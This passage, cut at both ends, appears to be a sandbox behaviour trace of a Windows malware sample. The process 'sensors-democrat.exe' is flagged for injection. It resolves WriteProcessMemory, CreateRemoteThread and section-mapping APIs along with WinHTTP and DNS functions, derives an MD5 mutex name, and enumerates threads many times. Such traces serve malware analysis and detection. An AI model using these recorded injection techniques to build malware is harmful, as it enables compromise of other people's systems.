lpte=0xf4fbf0) returned 1 [0175.526] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.526] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.526] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.527] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.527] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.527] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.527] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.528] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.528] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.528] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.529] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.529] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.529] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.529] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.530] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.530] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.530] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.530] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.531] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.531] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.531] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.532] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.532] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.532] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.532] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.533] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.533] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.533] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.534] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.534] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.534] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.534] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.535] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.535] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.535] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.536] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.536] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.536] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.536] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.537] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.537] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.537] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.537] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.538] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.538] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.538] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.539] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.539] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.539] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.539] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.541] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.541] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.541] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.541] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.542] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.542] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.542] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.543] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.543] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.543] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.544] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.544] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.544] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.545] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.545] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.545] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.546] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.546] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.546] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.547] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.547] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.547] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.547] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.548] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.548] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.548] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.549] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.569] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x184) returned 0x8c [0175.569] ResumeThread (hThread=0x8c) returned 0x1 [0175.569] CloseHandle (hObject=0x8c) returned 1 [0175.569] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x994) returned 0x8c [0175.569] ResumeThread (hThread=0x8c) returned 0x1 [0175.569] CloseHandle (hObject=0x8c) returned 1 [0175.702] CloseHandle (hObject=0x88) returned 1 [0175.702] VirtualQuery (in: lpAddress=0x810a00, lpBuffer=0xf4fbe4, dwLength=0x1c | out: lpBuffer=0xf4fbe4*(BaseAddress=0x810000, AllocationBase=0x7f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.702] GetProcessHeap () returned 0x7f0000 [0175.702] HeapFree (in: hHeap=0x7f0000, dwFlags=0x0, lpMem=0x810a00 | out: hHeap=0x7f0000) returned 1 [0175.702] VirtualQuery (in: lpAddress=0x8108f0, lpBuffer=0xf4fbe4, dwLength=0x1c | out: lpBuffer=0xf4fbe4*(BaseAddress=0x810000, AllocationBase=0x7f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.702] GetProcessHeap () returned 0x7f0000 [0175.702] HeapFree (in: hHeap=0x7f0000, dwFlags=0x0, lpMem=0x8108f0 | out: hHeap=0x7f0000) returned 1 [0175.702] RtlExitUserThread (Status=0x0) Process: id = "40" image_name = "sensors-democrat.exe" filename = "c:\\program files (x86)\\uninstall information\\sensors-democrat.exe" page_root = "0x657ad000" os_pid = "0x2ac" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files (x86)\\Uninstall Information\\sensors-democrat.exe\" " cur_dir = "C:\\Program Files (x86)\\Uninstall Information\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 289 os_tid = 0x990 Thread: id = 290 os_tid = 0x204 Thread: id = 291 os_tid = 0x31c [0175.001] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0175.001] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0175.001] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0175.002] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0175.002] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0175.002] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0175.002] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0175.002] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0175.002] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0175.002] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0175.002] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0175.002] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0175.002] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0175.002] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0175.002] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0175.003] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0175.003] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0175.003] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0175.003] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0175.003] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0175.003] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0175.003] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0175.003] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0175.003] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0175.003] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0175.003] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0175.003] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0175.003] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0175.004] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0175.004] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0175.004] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0175.004] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0175.004] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0175.004] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0175.004] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0175.004] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0175.004] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0175.004] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0175.004] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0175.004] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0175.004] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0175.005] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0175.005] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0175.005] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0175.005] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0175.005] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0175.005] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0175.015] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0175.015] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0175.015] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0175.022] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0175.022] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0175.022] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0175.022] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0175.023] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0175.023] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0175.023] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0175.023] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0175.023] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0175.023] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0175.023] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0175.023] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0175.026] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0175.026] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0175.026] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0175.026] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0175.026] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0175.026] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0175.026] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0175.027] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0175.027] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0175.027] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0175.027] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0175.027] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0175.027] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0175.027] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0175.027] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0175.027] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0175.027] VirtualProtect (in: lpAddress=0x90000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x2eefcf4 | out: lpflOldProtect=0x2eefcf4*=0x40) returned 1 [0175.027] VirtualProtect (in: lpAddress=0x90000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x2eefcf4 | out: lpflOldProtect=0x2eefcf4*=0x4) returned 1 [0175.029] VirtualQuery (in: lpAddress=0xa0016, lpBuffer=0x2eefcec, dwLength=0x1c | out: lpBuffer=0x2eefcec*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0175.029] GetProcessHeap () returned 0x3f0000 [0175.029] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x364) returned 0x410cc8 [0175.029] RtlMoveMemory (in: Destination=0x410cc8, Source=0xa0016, Length=0x363 | out: Destination=0x410cc8) [0175.029] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xa0016) returned 0x0 [0175.029] GetCurrentProcessId () returned 0x2ac [0175.029] GetProcessHeap () returned 0x3f0000 [0175.029] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x105) returned 0x411038 [0175.029] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x411038, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Uninstall Information\\sensors-democrat.exe" (normalized: "c:\\program files (x86)\\uninstall information\\sensors-democrat.exe")) returned 0x41 [0175.030] GetProcessHeap () returned 0x3f0000 [0175.030] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x105) returned 0x411148 [0175.030] GetCurrentProcessId () returned 0x2ac [0175.030] wsprintfA (in: param_1=0x411148, param_2="%s%d%d%d" | out: param_1="C:\\Program Files (x86)\\Uninstall Information\\sensors-democrat.exe3708421246843") returned 78 [0175.030] CryptAcquireContextA (in: phProv=0x2eefcf0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2eefcf0*=0x411298) returned 1 [0175.234] CryptCreateHash (in: hProv=0x411298, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2eefcf4 | out: phHash=0x2eefcf4) returned 1 [0175.234] lstrlenA (lpString="C:\\Program Files (x86)\\Uninstall Information\\sensors-democrat.exe3708421246843") returned 78 [0175.234] CryptHashData (hHash=0x411bb8, pbData=0x411148, dwDataLen=0x4e, dwFlags=0x0) returned 1 [0175.234] CryptGetHashParam (in: hHash=0x411bb8, dwParam=0x2, pbData=0x2eefce0, pdwDataLen=0x2eefcf8, dwFlags=0x0 | out: pbData=0x2eefce0, pdwDataLen=0x2eefcf8) returned 1 [0175.234] wsprintfA (in: param_1=0x411148, param_2="%02X" | out: param_1="E8") returned 2 [0175.234] wsprintfA (in: param_1=0x41114a, param_2="%02X" | out: param_1="B3") returned 2 [0175.234] wsprintfA (in: param_1=0x41114c, param_2="%02X" | out: param_1="EE") returned 2 [0175.234] wsprintfA (in: param_1=0x41114e, param_2="%02X" | out: param_1="37") returned 2 [0175.234] wsprintfA (in: param_1=0x411150, param_2="%02X" | out: param_1="81") returned 2 [0175.234] wsprintfA (in: param_1=0x411152, param_2="%02X" | out: param_1="77") returned 2 [0175.234] wsprintfA (in: param_1=0x411154, param_2="%02X" | out: param_1="98") returned 2 [0175.234] wsprintfA (in: param_1=0x411156, param_2="%02X" | out: param_1="F9") returned 2 [0175.234] wsprintfA (in: param_1=0x411158, param_2="%02X" | out: param_1="FE") returned 2 [0175.234] wsprintfA (in: param_1=0x41115a, param_2="%02X" | out: param_1="34") returned 2 [0175.234] wsprintfA (in: param_1=0x41115c, param_2="%02X" | out: param_1="B9") returned 2 [0175.234] wsprintfA (in: param_1=0x41115e, param_2="%02X" | out: param_1="B8") returned 2 [0175.234] wsprintfA (in: param_1=0x411160, param_2="%02X" | out: param_1="B3") returned 2 [0175.235] wsprintfA (in: param_1=0x411162, param_2="%02X" | out: param_1="26") returned 2 [0175.235] wsprintfA (in: param_1=0x411164, param_2="%02X" | out: param_1="7C") returned 2 [0175.235] wsprintfA (in: param_1=0x411166, param_2="%02X" | out: param_1="68") returned 2 [0175.235] CryptDestroyHash (hHash=0x411bb8) returned 1 [0175.235] CryptReleaseContext (hProv=0x411298, dwFlags=0x0) returned 1 [0175.235] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="E8B3EE37817798F9FE34B9B8B3267C68") returned 0x94 [0175.235] GetLastError () returned 0x0 [0175.235] Sleep (dwMilliseconds=0x1f4) [0175.807] GetCurrentProcessId () returned 0x2ac [0175.807] GetCurrentThreadId () returned 0x31c [0175.807] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x9c [0175.810] Thread32First (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.810] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.810] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.811] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.811] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.811] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.811] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.812] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.812] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.812] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.812] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.813] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.813] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.813] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.814] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.814] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.814] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.814] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.815] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.815] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.815] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.815] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.816] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.816] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.816] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.817] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.817] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.817] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.817] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.818] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.818] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.818] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.818] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.819] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.819] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.819] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.820] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.820] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.820] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.820] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.821] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.821] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.821] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.822] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.822] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.822] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.822] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.823] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.823] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.823] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.823] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.824] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.824] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.824] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.824] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.825] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.825] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.825] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.826] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.826] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.826] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.826] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.827] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.827] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.827] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.827] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.828] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.828] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.828] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.829] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.829] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.829] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.829] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.830] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.830] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.830] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.831] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.831] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.831] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.831] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.832] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.832] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.832] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.832] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.833] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.833] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.833] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.834] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.834] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.834] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.834] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.835] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.835] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.835] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.835] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.836] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.836] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.836] Thread32Next (hSnapshot=0x9c, 